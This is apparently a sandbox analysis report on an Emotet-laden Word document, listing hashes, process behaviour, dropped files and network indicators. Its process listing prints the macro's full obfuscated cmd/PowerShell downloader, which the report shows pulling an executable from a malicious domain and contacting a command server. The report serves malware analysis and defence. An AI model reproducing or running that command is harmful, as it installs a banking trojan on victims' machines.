analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Fact_Num_DUF0508319.doc

Full analysis: https://app.any.run/tasks/36baba0f-eb3f-4039-be2e-a21365e87f1f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 14, 2018, 14:18:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Asher-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 17:15:00 2018, Last Saved Time/Date: Tue Nov 13 17:15:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

74F9CA51BEA9FEDCD6D9CD4BE3ACB0AE

SHA1:

F2E679D2A08EDD7D51D9DAAEE55DC3DCFB55EC6F

SHA256:

A21406323EFE6B830EEEF16EC87DBC58428049C940A4737273608E1FC8D9F973

SSDEEP:

1536:ByJocn1kp59gxBK85fBt+a9ZRtYOMKBf+nE9KYFd1NoNrPJ+o2b79IpG4C+w:B341k/W48ptYOMKBf+nE9KYFd1NoNrPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 912)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2236)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 912)
    • Application was dropped or rewritten from another process

      • 614.exe (PID: 3860)
      • 614.exe (PID: 2848)
      • lpiograd.exe (PID: 2712)
      • lpiograd.exe (PID: 3684)
      • lpiograd.exe (PID: 3612)
      • lpiograd.exe (PID: 2348)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3600)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3600)
    • Emotet process was detected

      • lpiograd.exe (PID: 2712)
      • lpiograd.exe (PID: 3612)
    • EMOTET was detected

      • lpiograd.exe (PID: 3684)
    • Connects to CnC server

      • lpiograd.exe (PID: 3684)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 3684)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • CMD.exe (PID: 3748)
    • Creates files in the user directory

      • powershell.exe (PID: 3600)
      • notepad++.exe (PID: 884)
    • Application launched itself

      • 614.exe (PID: 3860)
      • lpiograd.exe (PID: 2712)
      • lpiograd.exe (PID: 3612)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3600)
      • 614.exe (PID: 2848)
    • Starts itself from another location

      • 614.exe (PID: 2848)
    • Connects to unusual port

      • lpiograd.exe (PID: 3684)
      • lpiograd.exe (PID: 2348)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 912)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 912)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Asher-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:13 17:15:00
ModifyDate: 2018:11:13 17:15:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
13
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 614.exe no specs 614.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe taskmgr.exe no specs notepad++.exe gup.exe #EMOTET lpiograd.exe no specs lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
912"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Fact_Num_DUF0508319.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3748CMD /c C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd^&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( ^&", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2236C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( &", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')"C:\windOws\sYstem32\cmd.exeCMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3600poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) | & ( \"{0}{1}\" -f 'iE','X')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3860"C:\Users\admin\AppData\Local\Temp\614.exe" C:\Users\admin\AppData\Local\Temp\614.exepowershell.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.2.9200.
2848"C:\Users\admin\AppData\Local\Temp\614.exe"C:\Users\admin\AppData\Local\Temp\614.exe
614.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.2.9200.
2712"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
614.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.2.9200.
3684"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.2.9200.
3088"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
884"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.51
Total events
2 242
Read events
1 806
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
7
Unknown types
2

Dropped files

PID
Process
Filename
Type
912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR94C9.tmp.cvr
MD5:
SHA256:
3600powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1NP2LQ9FG2RCAUF7WCIG.temp
MD5:
SHA256:
912WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:46657F1A50DF725103B794483AC2AC3C
SHA256:E0BD2DCAB3F6D5D9336342A8048139DA35531DF6D3653C5CA843E315FE461F81
3600powershell.exeC:\Users\admin\AppData\Local\Temp\614.exeexecutable
MD5:94294089902972AF7740A964BDBD2A39
SHA256:AFBB5D83F5C9D104A2E478A05D4350F9AD01AA82B66554F452F1336005461346
2848614.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:94294089902972AF7740A964BDBD2A39
SHA256:AFBB5D83F5C9D104A2E478A05D4350F9AD01AA82B66554F452F1336005461346
884notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\config.xmlxml
MD5:285C3B8464D439E58840F0F3DA8A97E9
SHA256:0233D55693A0182C3E252CE02D172AB00A20DF2013E6DECAD1B62A7775A12465
912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ct_Num_DUF0508319.docpgc
MD5:23472F13F93864BE7EE122EF0B11F9AF
SHA256:5179C11B028583BF08398B8D7FA03B5E7C86629EE44BB5B9FE8ED4D23F958412
3600powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3600powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da13d.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
884notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\stylers.xmlxml
MD5:44982E1D48434C0AB3E8277E322DD1E4
SHA256:3E661D3F1FF3977B022A0ACC26B840B5E57D600BC03DCFC6BEFDB408C665904C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3684
lpiograd.exe
GET
200
50.78.167.65:7080
http://50.78.167.65:7080/
US
binary
132 b
malicious
3600
powershell.exe
GET
200
204.152.208.130:80
http://akucakep.com/JhVWKzotm/
US
executable
448 Kb
malicious
GET
200
2.16.106.80:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D
unknown
der
471 b
whitelisted
GET
200
2.16.106.80:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D
unknown
der
727 b
whitelisted
3600
powershell.exe
GET
301
204.152.208.130:80
http://akucakep.com/JhVWKzotm
US
html
1.12 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2.16.106.80:80
ocsp.usertrust.com
Akamai International B.V.
whitelisted
3684
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious
1776
gup.exe
37.59.28.236:443
notepad-plus-plus.org
OVH SAS
FR
whitelisted
3600
powershell.exe
204.152.208.130:80
akucakep.com
QuadraNet, Inc
US
suspicious
2348
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious

DNS requests

Domain
IP
Reputation
akucakep.com
  • 204.152.208.130
malicious
notepad-plus-plus.org
  • 37.59.28.236
whitelisted
ocsp.usertrust.com
  • 2.16.106.80
  • 2.16.106.50
whitelisted

Threats

PID
Process
Class
Message
3600
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3600
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3600
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3600
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3684
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
Process
Message
notepad++.exe
VerifyLibrary: certificate revocation checking is disabl∔Ѻ匮罁簥ǔ↜ѺVerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093